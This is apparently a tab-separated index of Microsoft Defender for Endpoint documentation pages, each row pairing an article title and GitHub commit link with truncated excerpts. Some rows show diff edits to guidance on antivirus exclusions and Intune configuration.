security	Analyzer Feedback	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/analyzer-feedback.md	If you have feedback or suggestions that would help us improve the Microsoft Def 2. Microsoft 365 Defender portal (security.microsoft.com): :::image type="content" source="images/1d5b3c010b4b5c0e9d5eb43f71fa95e3.png" alt-text="The Give feedback button" lightbox="images/1d5b3c010b4b5c0e9d5eb43f71fa95e3.png":::
security	Analyzer Report	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/analyzer-report.md	To include analyzer result files [when opening a support ticket](contact-support > [!NOTE] > If the file size is larger than 25 MB, the support engineer assigned to your case will provide a dedicated secure workspace to upload large files for analysis.
security	Android Configure Mam	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-configure-mam.md	Use the following steps to configure the Disable sign out: - [Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune](android-intune.md)
security	Android Configure	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-configure.md	Use the following steps to configure Disable sign-out: - [Overview of Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md) - [Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune](android-intune.md)
security	Android Intune	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-intune.md	Organizations can communicate to their users to protect Personal profile with Mi - [Overview of Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md) - [Configure Microsoft Defender for Endpoint on Android features](android-configure.md)
security	Android Privacy	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-privacy.md	Optional data includes diagnostic data and feedback data. Optional diagnostic da - The user's email address, if they choose to provide it. - Feedback type (smile, frown, idea) and any feedback comments submitted by the user.
security	Android Support Signin	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-support-signin.md	If a user faces an issue, which isn't already addressed in the above sections or :::image type="content" source="images/finalsubmit5.png" alt-text="The pane on which you can add details and attach diagnostic data" lightbox="images/finalsubmit5.png"::: 6. Click on "Submit" to successfully send the feedback.
security	Android Whatsnew	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-whatsnew.md	Notify your users and helpdesk (as applicable) that users will need to accept th > [!NOTE] > This permission allows Microsoft Defender for Endpoint to access storage on user's device, which helps detect and remove malicious and unwanted apps. Microsoft Defender for Endpoint accesses/scans Android app package file (.apk) only. On devices with a Work Profile, Defender for Endpoint only scans work-related files.
security	Api Explorer	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-explorer.md	Credentials to access an API aren't needed. The API Explorer uses the Defender f The logged-in user authentication credential is used to verify that the API Explorer is authorized to access data on your behalf. Specific API requests are limited based on your RBAC privileges. For example, a request to "Submit indicator" is limited to the security admin role.
security	Api Hello World	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-hello-world.md	You're all done! You have just successfully: - [Microsoft Defender for Endpoint APIs](exposed-apis-list.md) - [Access Microsoft Defender for Endpoint with application context](exposed-apis-create-app-webapp.md) - [Access Microsoft Defender for Endpoint with user context](exposed-apis-create-app-nativeapp.md)
security	Api Microsoft Flow	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-microsoft-flow.md	You can also create a scheduled flow that runs Advanced Hunting queries and ## Related topic - [Microsoft Defender for Endpoint APIs](apis-intro.md)
security	Api Power Bi	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-power-bi.md	View the Microsoft Defender for Endpoint Power BI report samples. For more infor - [Defender for Endpoint APIs](apis-intro.md) - [Advanced Hunting API](run-advanced-query-api.md) - [Using OData Queries](exposed-apis-odata-samples.md)
security	Api Release Notes	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-release-notes.md	The following information lists the updates made to the Microsoft Defender for E ### 01.09.2020 - Added option to expand the Alert entity with its related Evidence. See [List Alerts](get-alerts.md).
security	Apis Intro	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/apis-intro.md	You can access Defender for Endpoint API with Application Context or **User - [Microsoft Defender for Endpoint APIs](exposed-apis-list.md) - [Access Microsoft Defender for Endpoint with application context](exposed-apis-create-app-webapp.md) - [Access Microsoft Defender for Endpoint with user context](exposed-apis-create-app-nativeapp.md)
security	Application Deployment Via Mecm	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/application-deployment-via-mecm.md	Copy the unified solution package, onboarding script and migration script to the - [Microsoft Defender for Endpoint - Configuration Manager](/mem/configmgr/protect/deploy-use/defender-advanced-threat-protection) - [Onboard Windows servers to the Microsoft Defender for Endpoint service](configure-server-endpoints.md) - [Microsoft Defender for Endpoint: Defending Windows Server 2012 R2 and 2016](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/defending-windows-server-2012-r2-and-2016/ba-p/2783292)
security	Assign Portal Access	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/assign-portal-access.md	Defender for Endpoint supports two ways to manage permissions: - [Use basic permissions to access the portal](basic-permissions.md) - [Manage portal access using RBAC](rbac.md)
security	Attack Simulations	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-simulations.md	Read the walkthrough document provided with each attack scenario. Each document - [Onboard devices](onboard-configure.md) - [Onboard Windows devices](configure-endpoints.md)
security	Attack Surface Reduction Rules Deployment Implement	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-implement.md	You can customize the notification for when a rule is triggered and blocks an ap ## See also - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security	Attack Surface Reduction Rules Deployment Operationalize	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-operationalize.md	For more information about hunting options, see: [Demystifying attack surface re [Enable attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-implement.md) [Attack surface reduction (ASR) rules reference](attack-surface-reduction-rules-reference.md)
security	Attack Surface Reduction Rules Deployment Plan	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-plan.md	See: [Create a deployment plan for Windows](/windows/deployment/update/create-de [Operationalize attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-operationalize.md) [Attack surface reduction (ASR) rules reference](attack-surface-reduction-rules-reference.md)
security	Attack Surface Reduction Rules Deployment Test	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-test.md	Event ID \| Description [Operationalize attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-operationalize.md) [Attack surface reduction (ASR) rules reference](attack-surface-reduction-rules-reference.md)
security	Attack Surface Reduction Rules Deployment	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment.md	Some rules don't work well if un-signed, internally developed application and sc [ASR rules Configurations](https://security.microsoft.com/asr?viewid=configuration) [ASR rules Exclusions](https://security.microsoft.com/asr?viewid=exclusions)
security	Attack Surface Reduction Rules Reference	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference.md	Dependencies: Microsoft Defender Antivirus, Cloud Protection - [Attack surface reduction \(ASR\) rules report](attack-surface-reduction-rules-report.md) - [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md) - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security	Attack Surface Reduction Rules Report	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-report.md	The Add exclusion page has two buttons for actions that can be used on any detec - [Operationalize attack surface reduction (ASR) rules](attack-surface-reduction-rules-deployment-operationalize.md) - [Attack surface reduction \(ASR\) rules report](attack-surface-reduction-rules-report.md) - [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)
security	Attack Surface Reduction	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction.md	The "engine version" listed for attack surface reduction events in the event log > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Auto Investigation Action Center	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/auto-investigation-action-center.md	To get to the unified Action center in the improved Microsoft 365 Defender porta - [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md) - [Compare security features in Microsoft 365 plans for small and medium-sized businesses](../defender-business/compare-mdb-m365-plans.md)
security	Autoir Investigation Results	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/autoir-investigation-results.md	To provide more context about how investigation states show up, the following ta - [Review remediation actions following an automated investigation](manage-auto-investigation.md) - [View and organize the Microsoft Defender for Endpoint Incidents queue](view-incidents-queue.md)
security	Automated Investigations	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/automated-investigations.md	Currently, AIR only supports the following OS versions: - [PUA protection](/windows/security/threat-protection/microsoft-defender-antivirus/detect-block-potentially-unwanted-apps-microsoft-defender-antivirus) - [Automated investigation and response in Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/air-about) - [Automated investigation and response in Microsoft 365 Defender](/microsoft-365/security/defender/m365d-autoir)
security	Automation Levels	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/automation-levels.md	Automated investigation and remediation (AIR) capabilities in Microsoft Defender - [Configure automated investigation and remediation capabilities in Defender for Endpoint](configure-automated-investigations-remediation.md) - [Visit the Action Center](/microsoft-365/security/defender-endpoint/auto-investigation-action-center#the-action-center)
security	Azure Server Integration	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/azure-server-integration.md	The following capabilities are included in this integration: - [Onboard previous versions of Windows](onboard-downlevel.md) - [Onboard Windows Server 2012 R2, 2016, SAC version 1803, and 2019](configure-server-endpoints.md)
security	Basic Permissions	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/basic-permissions.md	For more information, see [Assign administrator and non-administrator roles to u ## Related topic - [Manage portal access using RBAC](rbac.md)
security	Batch Update Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/batch-update-alerts.md	POST https://api.securitycenter.microsoft.com/api/alerts/batchUpdate "comment": "Resolve my alert and assign to secop2" } ```
security	Behavioral Blocking Containment	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/behavioral-blocking-containment.md	This example shows that with behavioral blocking and containment capabilities, t - [See recent global threat activity](https://www.microsoft.com/wdsi/threats) - [Get an overview of Microsoft 365 Defender](../defender/microsoft-365-defender.md)
security	Built In Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/built-in-protection.md	Built-in protection is a set of default settings. You aren't required to keep th - [Configure Microsoft Defender for Endpoint in Intune](/mem/intune/protect/advanced-threat-protection-configure) - [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration) - [Responding to ransomware attacks](../defender/playbook-responding-ransomware-m365-defender.md)
security	Cancel Machine Action	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/cancel-machine-action.md	https://api.securitycenter.microsoft.com/api/machineactions/988cc94e-7a8f-4b28-a ## Related article - [Get machine action API](get-machineaction-object.md)
security	Check Sensor Status	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/check-sensor-status.md	You can view the device details when you click on a misconfigured or inactive de - [Run the client analyzer on Windows](run-analyzer-windows.md) - [Run the client analyzer on macOS or Linux](run-analyzer-macos-linux.md) - [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md)
security	Client Behavioral Blocking	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/client-behavioral-blocking.md	If your organization is using Defender for Endpoint, client behavioral blocking > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Cloud Protection Microsoft Antivirus Sample Submission	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-antivirus-sample-submission.md	There are two more scenarios where Defender for Endpoint might request a file sa [Next-generation protection overview](next-generation-protection.md) [Configure remediation for Microsoft Defender Antivirus detections.](configure-remediation-microsoft-defender-antivirus.md)
security	Cloud Protection Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-defender-antivirus.md	Cloud protection is enabled by default. However, you might need to re-enable it If your subscription includes Windows 10 E5, you can take advantage of emergency dynamic intelligence updates, which provide near real-time protection from emerging threats. When you turn on cloud protection, fixes for malware issues can be delivered via the cloud within minutes, instead of waiting for the next update. See [Configure Microsoft Defender Antivirus to automatically receive new protection updates based on reports from our cloud service](manage-event-based-updates-microsoft-defender-antivirus.md#cloud-report-updates).
security	Collect Diagnostic Data Update Compliance	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/collect-diagnostic-data-update-compliance.md	On at least two devices that are not reporting or showing up in Update Complianc - [Troubleshoot Microsoft Defender Antivirus reporting](troubleshoot-reporting.md) - [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
security	Collect Diagnostic Data	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/collect-diagnostic-data.md	You can also specify where the diagnostic .cab file will be created using a Grou - [Troubleshoot Microsoft Defender Antivirus reporting](troubleshoot-reporting.md) - [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
security	Collect Investigation Package	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/collect-investigation-package.md	POST https://api.securitycenter.microsoft.com/api/machines/fb9ab6be3965095a09c05 "Comment": "Collect forensics due to alert 1234" } ```
security	Command Line Arguments Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/command-line-arguments-microsoft-defender-antivirus.md	The following table lists common errors that can occur while using the MpCmdRun - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) - [Configure Defender for Endpoint on Android features](android-configure.md) - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Common Errors	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/common-errors.md	When contacting us about an error, attaching this ID helps find the root cause o } } ```
security	Common Exclusion Mistakes Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/common-exclusion-mistakes-microsoft-defender-antivirus.md	Title: Common mistakes to avoid when defining exclusions description: Avoid common mistakes when defining exclusions for Microsoft Defender Antivirus scans. -keywords: exclusions, files, extension, file type, folder name, file name, scans -ms.sitesec: library -ms.pagetype: security ms.localizationpriority: medium Previously updated : 03/06/2023 Last updated : 07/18/2023 - m365-security - tier2 search.appverid: met150 You can define an exclusion list for items that you don't want Microsoft Defender Antivirus to scan. However, excluded items could contain threats that make your device vulnerable. This article describes some common mistakes that you should avoid when defining exclusions. > [!TIP] -> Before defining your exclusion lists, see [Recommendations for defining exclusions](configure-exclusions-microsoft-defender-antivirus.md#recommendations-for-defining-exclusions) and review the detailed information in [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md). +> Before defining your exclusion lists, see [Important points about exclusions](configure-exclusions-microsoft-defender-antivirus.md#important-points-about-exclusions) and review the detailed information in [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md). ## Excluding certain trusted items -Certain files, file types, folders, or processes shouldn't be excluded from scanning even though you trust them to be not malicious. - -Don't define exclusions for the folder locations, file extensions, and processes that are listed in the following sections: +Certain files, file types, folders, or processes shouldn't be excluded from scanning even though you trust that they're not malicious. Don't define exclusions for the folder locations, file extensions, and processes that are listed in the following sections: - [Folder locations](#folder-locations) - [File extensions](#file-extensions) Don't define exclusions for the folder locations, file extensions, and processes ### Folder locations > [!IMPORTANT] -> Certain folders shouldn't be excluded from scans because they end up being folders where malicious files can get dropped. +> Certain folders shouldn't be excluded from scans because they can end up being folders where malicious files can get dropped. -In general, don't define exclusions for the following folder locations: +In general, don't define exclusions for any of the following folder locations: - `%systemdrive%` - `C:`, `C:\`, or `C:\*` Microsoft Defender Antivirus Service runs in system context using the LocalSyste See [Use wildcards in the file name and folder path or extension exclusion lists](configure-extension-file-exclusions-microsoft-defender-antivirus.md#use-wildcards-in-the-file-name-and-folder-path-or-extension-exclusion-lists) for information on how to use wildcards in exclusion lists. -> [!TIP] -> If you're looking for Antivirus related information for other platforms, see: -> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md) -> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md) -> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos) -> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) -> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) -> - [Configure Defender for Endpoint on Android features](android-configure.md) -> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) - ## See also - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md) +- [Configure custom exclusions for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md) +- [Configure and validate exclusions for Microsoft Defender for Endpoint on Linux](linux-exclusions.md) +- [Configure and validate exclusions for Microsoft Defender for Endpoint on macOS](mac-exclusions.md) ++
security	Community	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/community.md	There are several ways you can access the Community Center: You can instantly view and read conversations that have been posted in the community. To get the full experience within the community such as being able to comment on posts, you'll need to join the community. For more information on how to get started in the Microsoft Tech Community, see [Microsoft Tech Community: Getting Started](https://techcommunity.microsoft.com/t5/Getting-Started/Microsoft-Tech-Community-Getting-Started-Guide/m-p/77888#M15).
security	Comprehensive Guidance On Linux Deployment	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/comprehensive-guidance-on-linux-deployment.md	Then your next step is to uninstall your non-Microsoft antivirus, antimalware, a - [Privacy for Microsoft Defender for Endpoint on Linux](linux-privacy.md) - [What's new in Microsoft Defender for Endpoint on Linux](linux-whatsnew.md)
security	Conditional Access	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/conditional-access.md	The following example sequence of events explains Conditional Access in action: ## Related topic - [Configure Conditional Access in Microsoft Defender for Endpoint](configure-conditional-access.md)
security	Configuration Management Reference Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configuration-management-reference-microsoft-defender-antivirus.md	The following articles provide further information, links, and resources for usi > - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) -> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) +> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Configure Advanced Scan Types Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-advanced-scan-types-microsoft-defender-antivirus.md	If Microsoft Defender Antivirus detects a threat inside an email message, the fo On any OS, only the network drives that are mapped at system level, are scanned. User-level mapped network drives aren't scanned. User-level mapped network drives are those that a user maps in their session manually and using their own credentials.
security	Configure Automated Investigations Remediation	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-automated-investigations-remediation.md	If you're using Defender for Endpoint, you can specify an automation level so th - [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md) - [Automation levels in automated investigation and remediation](automation-levels.md)
security	Configure Block At First Sight Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus.md	If you have a personal device that is not managed by an organization, you might - [Enable cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md) - [Stay protected with Windows Security](https://support.microsoft.com/windows/stay-protected-with-windows-security-2ae0363d-0ada-c064-8b56-6a39afb6a963) - [Onboard non-Windows devices](configure-endpoints-non-windows.md)
security	Configure Cloud Block Timeout Period Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-cloud-block-timeout-period-microsoft-defender-antivirus.md	You can use Group Policy to specify an extended timeout for cloud checks. > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Configure Conditional Access	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-conditional-access.md	Take the following steps to enable Conditional Access: For more information, see [Enforce compliance for Microsoft Defender for Endpoint with Conditional Access in Intune](/intune/advanced-threat-protection). > Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-conditionalaccess-belowfoldlink)
security	Configure Contextual File Folder Exclusions Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus.md	To exclude a file or folder only when accessed by a specific process, create a n After constructing your desired contextual exclusions, you can use your existing management tool to configure file and folder exclusions using the string you created. See: [Configure and validate exclusions for Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)
security	Configure Device Discovery	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-device-discovery.md	DeviceInfo - [Device discovery overview](device-discovery.md) - [Device discovery FAQs](device-discovery-faq.md)
security	Configure Endpoints Gp	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-gp.md	When you configure cloud protection level policy to **Default Microsoft Defender - [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) - [Run a detection test on a newly onboarded Microsoft Defender for Endpoint devices](run-detection-test.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security	Configure Endpoints Mdm	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-mdm.md	For more information on Microsoft Intune policy settings, see [Windows 10 policy - [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) - [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security	Configure Endpoints Non Windows	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-non-windows.md	You can also offboard non-Windows devices by disabling the third-party integrati - [Onboard servers](configure-server-endpoints.md) - [Configure proxy and Internet connectivity settings](configure-proxy-internet.md) - [Troubleshooting Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security	Configure Endpoints Sccm	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-sccm.md	For more information, see [Introduction to compliance settings in System Center - [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) - [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security	Configure Endpoints Script	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-script.md	Monitoring can also be done directly on the portal, or by using the different de - [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md) - [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security	Configure Endpoints Vdi	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-vdi.md	The following configuration settings are recommended: - [Onboard Windows devices using Mobile Device Management tools](configure-endpoints-mdm.md) - [Onboard Windows devices using a local script](configure-endpoints-script.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security	Configure Exclusions Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-exclusions-microsoft-defender-antivirus.md	Title: Set up exclusions for Microsoft Defender Antivirus scans -description: You can exclude files (including files modified by specified processes) and folders from being scanned by Microsoft Defender Antivirus. Validate your exclusions with PowerShell. -keywords: + Title: Configure custom exclusions for Microsoft Defender Antivirus +description: You can exclude files (including files modified by specified processes) and folders from Microsoft Defender Antivirus scans. -ms.sitesec: library ms.localizationpriority: medium Previously updated : 04/14/2023 Last updated : 07/18/2023 search.appverid: met150 -# Configure and validate exclusions for Microsoft Defender Antivirus scans +# Configure custom exclusions for Microsoft Defender Antivirus Applies to: - [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037) search.appverid: met150 Platforms - Windows -You can exclude certain files, folders, processes, and process-opened files from Microsoft Defender Antivirus scans. Such exclusions apply to [scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md), [on-demand scans](run-scan-microsoft-defender-antivirus.md), and [always-on real-time protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md). Exclusions for process-opened files only apply to real-time protection. +In general, you shouldn't need to define exclusions for Microsoft Defender Antivirus. However, if necessary, you can exclude files, folders, processes, and process-opened files from Microsoft Defender Antivirus scans. These types of exclusions are known as custom exclusions. This article describes how to define custom exclusions for Microsoft Defender Antivirus with Microsoft Intune and includes links to other resources for more information. + +Custom exclusions apply to [scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md), [on-demand scans](run-scan-microsoft-defender-antivirus.md), and [always-on real-time protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md). Exclusions for process-opened files only apply to real-time protection. > [!TIP] > For a detailed overview of suppressions, submissions, and exclusions across Microsoft Defender Antivirus and Defender for Endpoint, see [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md). ## Configure and validate exclusions -To configure and validate exclusions, see the following: +> [!CAUTION] +> Use Microsoft Defender Antivirus extensions sparingly. Make sure to review the information in [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md). + +If you're using Microsoft Intune to manage Microsoft Defender Antivirus or Microsoft Defender for Endpoint, use the following procedures to define exclusions: + +- [Manage antivirus exclusions in Intune (for existing policies)](#manage-antivirus-exclusions-in-intune-for-existing-policies) +- [Create a new antivirus policy with exclusions in Intune](#create-a-new-antivirus-policy-with-exclusions-in-intune) + +If you're using another tool, such as Configuration Manager or Group Policy, or you want more detailed information about custom exclusions, see these articles: + +- [Configure and validate exclusions based on file extension and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md) +- [Configure exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md) +- [Configure contextual file and folder exclusions](configure-contextual-file-folder-exclusions-microsoft-defender-antivirus.md) to configure restrictions for your exclusions. + +#### Manage antivirus exclusions in Intune (for existing policies) + +1. In the [Microsoft Intune admin center](https://intune.microsoft.com), choose Endpoint security \> Antivirus, and then select an existing policy. (If you don't have an existing policy, or you want to create a new policy, skip to [Create a new antivirus policy with exclusions in Intune](#create-a-new-antivirus-policy-with-exclusions-in-intune).) + +2. Choose Properties, and next to Configuration settings, choose Edit. + +3. Expand Microsoft Defender Antivirus Exclusions and then specify your exclusions. + + - Excluded Extensions are exclusions that you define by file type extension. These extensions apply to any file name that has the defined extension without the file path or folder. Separate each file type in the list must be separated with a `\|` character. For example, `lib\|obj`. For more information, see 